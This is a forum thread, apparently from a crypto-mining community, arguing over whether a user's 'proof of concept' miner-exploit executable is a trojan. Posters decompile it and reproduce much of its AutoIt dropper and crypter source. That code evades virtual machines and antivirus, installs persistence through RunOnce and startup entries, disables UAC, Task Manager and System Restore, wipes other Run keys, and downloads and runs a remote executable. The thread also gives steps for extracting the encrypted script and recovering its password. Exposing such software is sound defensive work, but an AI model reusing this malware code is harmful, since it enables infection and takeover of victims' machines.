		If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
			__bsod($scriptname, False)
		EndIf
		If WinExists($path) Then
			bsod()
		Else
		EndIf
		Sleep(100)
	WEnd
EndFunc

Yeah, why should I bother run this in a vm ?

Nice game OP... but you loose !

[sandor111]

Yuck, that is some nasty code... WTF, really..?

[Sarge]

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on you OWN miners.


When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef

• problem and solution are mystical
• Filename for download different than the file to the online scanner
• Author claims it's clean while making his statement look like the typical nigerian prince scam (colors, bold, repeating word clean several times)
• Code can't be run in a VM (WTF, why?!)
• When a network sniffer is detected to the program shuts it self down (WTF²)
• no supposed MD5 hash posted

reminds me of "your from Anonymous Proxy too, let's meet up"


seems legit!  <<< don't take this seriosly

[bitpop]

I love Lua

Op is delusional

[steve15]

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...

Code:

#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
	delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
	mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
	startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
	antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
	fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
	botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
	downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
	disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
	disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
	antitask()
Else
EndIf

Func delay()
	$counter = 0
	While $counter <= 5
		Sleep(5000)
		ShellExecute(@SystemDir & "\mshta.exe")
		$counter = $counter + 1
		_rundos("taskkill /IM mshta.exe")
	WEnd
EndFunc

Func systemhide()
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
	$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
	$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
	$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
	If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
	Else
		MsgBox($type, $title, $message)
		FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
	EndIf
EndFunc

Func mutex()
	$scriptname = "lmsqQw.exe"
	If UBound(ProcessList($scriptname)) > 2 Then Exit 
EndFunc

Func antitask()
	$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
	If NOT ($read_antitask = "1") Then
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
	EndIf
EndFunc

Func disable_uac()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If NOT ($read_uac = "0") Then
		RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
	EndIf
EndFunc

Func startup()
	$buac = _checkelevationenabled()
	If $buac = 0 Then
	Else
		FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
		FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
	EndIf
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
	If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
		Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
		$autoit3 = "lmsqQw.exe"
		FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
		FileClose($bat)
		Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
		FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
		FileClose($vbs)
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
		If FileExists($unicode_startup & "\start.lnk") Then
			FileDelete($unicode_startup & "\start.lnk")
		EndIf
	Else
	EndIf
EndFunc

Func _checkelevationenabled()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If @error Then Return 
	Local $struct = DllStructCreate("BOOL")
	Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
	If @error Then
		Return SetError(@error)
	EndIf
	Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
	If WinGetText("Program Manager") = "0" Then
		Exit 
	Else
	EndIf
	If ProcessExists("VboxService.exe") Then
		Exit 
	EndIf
	If ProcessExists("VMwaretray.exe") Then
		Exit 
	EndIf
EndFunc

Func persistence()
	If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
		$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
		ShellExecute($pathtovbs)
		Exit 
	EndIf
EndFunc

Func downloader()
	If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
	Else
		FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
		$random_download_name = Random(10000, 99999, 1) & ".exe"
		Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
		Do
			Sleep(250)
		Until InetGetInfo($hdownload, 2)
		Local $nbytes = InetGetInfo($hdownload, 0)
		InetClose($hdownload)
		ShellExecute($unicode_userprofile & "\" & $random_download_name)
	EndIf
EndFunc

Func bsod()
	$a = ProcessList()
	For $i = 1 To UBound($a) - 1
		ProcessClose($a[$i][0])
	Next
	Exit 
EndFunc

Func botkiller()
	RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
	If FileExists($uniscriptdir & "\check.txt") Then
	Else
		RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
		FileWrite($uniscriptdir & "\check.txt", "")
	EndIf
EndFunc

Func _rundos($scommand)
	Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
	Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
	While 1
		If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
			__bsod($scriptname, False)
		EndIf
		If WinExists($path) Then
			bsod()
		Else
		EndIf
		Sleep(100)
	WEnd
EndFunc

Yeah, why should I bother run this in a vm ?

Nice game OP... but you loose !

Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source
The source you just posted proofs that none of the functions included, except the anti virtuals, are being used.

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...

If you didn't even see that one, even after decompiling the exectuble, well, i'm sorry, but your unskilled then.
Plus, if you followed the topic, i explicitly posted about crypting the source.

Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM as i asked you, and we'll compare our sources.

Then once again, you will be disapointed by yourself. For the third time in row.

[bitpop]

Show him lemmy, don't hold back.

[steve15]

Here are my beliefs

ici_lemmy does not even own mining equipment.

Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files.
Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.

Why else decompile before trying...

Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.

For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected.
This was also posted by me before posting the tool.

As ici_lemmy himself posts, he is disapointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!

This proves to me his eager to get to the core files to abuse them.

If i had a program that was as evil as he tries to picture it, i whould have deleted it by now.
Seems also logic that any AV/AM/FW scanner picked it up by now.

So for the last and final time:

IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.

I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.

As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better of just mining with your rigs, smiling while reading your posts about it...

Thank you

[Chancellor]

Here are my beliefs

And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

[ici_lemmy]

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability

[steve15]

Here are my beliefs

And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

You are right about some parts.

1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger
2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think?

Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose.

People are not suspicious about a PDF, and they need to open it anyway.

[steve15]

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability

You really are an idiot, excuse my language.

Try this:

- Download whatever executable file online, for example Firefox installer.
- Scan with virustotal = 0/50
- Disasemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to virustotal = bam, at least 40/50

Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert.
That is the main reason why you cant fake EXE file assembly without triggering an alert.

Also notice our hashes:

My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3

You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
Hashcheck is not the same, so it is not the same file, period. That's called faking results.

You file contains at lease 15 DLL files that are not even present in my code!

THIS are the files included:



Try this second method:

Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to virustotal = bam, 40/50

So please, you have no idea what you are talking about.
You still failed to post the actual exploit code also.

You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions.

At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.

[ici_lemmy]

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...

[steve15]

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...

Just explain why you upload a whole different file, containing over more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application for example.

Your posts are worth nothing dude. Get lost. And see my edits above in my last post.

[Chancellor]

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...

Regardless of what is really contained in this file (and it looks fishy indeed), the above quote is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then:
1. Miners would know what the danger really is, without running some encrypted, suspicious executables. Then they can react fast and protect their rigs.
2. KNC would be forced to patch their firmware quickly, if really needed.
3. You would be acknowledged as the discoverer and would show your real pentesting skill.
I would go for disclosure, especially as you said that KNC tried to hide the problem under the carpet. Instead, the fact is the whole story is directed by you in a way that try to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...

[nuno12345]

One last shot...

AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c

AutoIt script, encrypted code:

Code:

">>>AUTOIT SCRIPT<<<"
"wb"
"%.15g"
"0x%p"
"True"
"False"
"%s (%d) : ==> %s.: %s %s"
"Line %d:"
"Line %d  (File "%s"):"
"Error: "
"AU3_FreeVar"
....
"SeDebugPrivilege"

More at 001FE0D0

Processor/virtual env check
Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent

Debugger check stages
Address=0019D7C6, Destination=kernel32.IsDebuggerPresent
Address=001A7DB7, Destination=kernel32.IsDebuggerPresent
Address=001B1EE1, Destination=kernel32.IsDebuggerPresent

I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it.

Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.

[ici_lemmy]

Linux :

Code:

$unzip minerProofOfConcept.zip
$unrar e minerProof.exe
$sed '/^;/d' crLyJ > tmp.au3
$nano tmp.au3
$//^^modify to keep only _crypt_* funtions and code call to _crypt_decryptdata with good param
$cp * /windows/

And under windows :

Code:

>lmsqQw.exe tmp.au3

Send the resulting file to any antivirus...

You'll see yourself

[steve15]

Moderator please remove this topic

Source code of the project has been sold. I do no longer support the application or it's source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.

Thank you.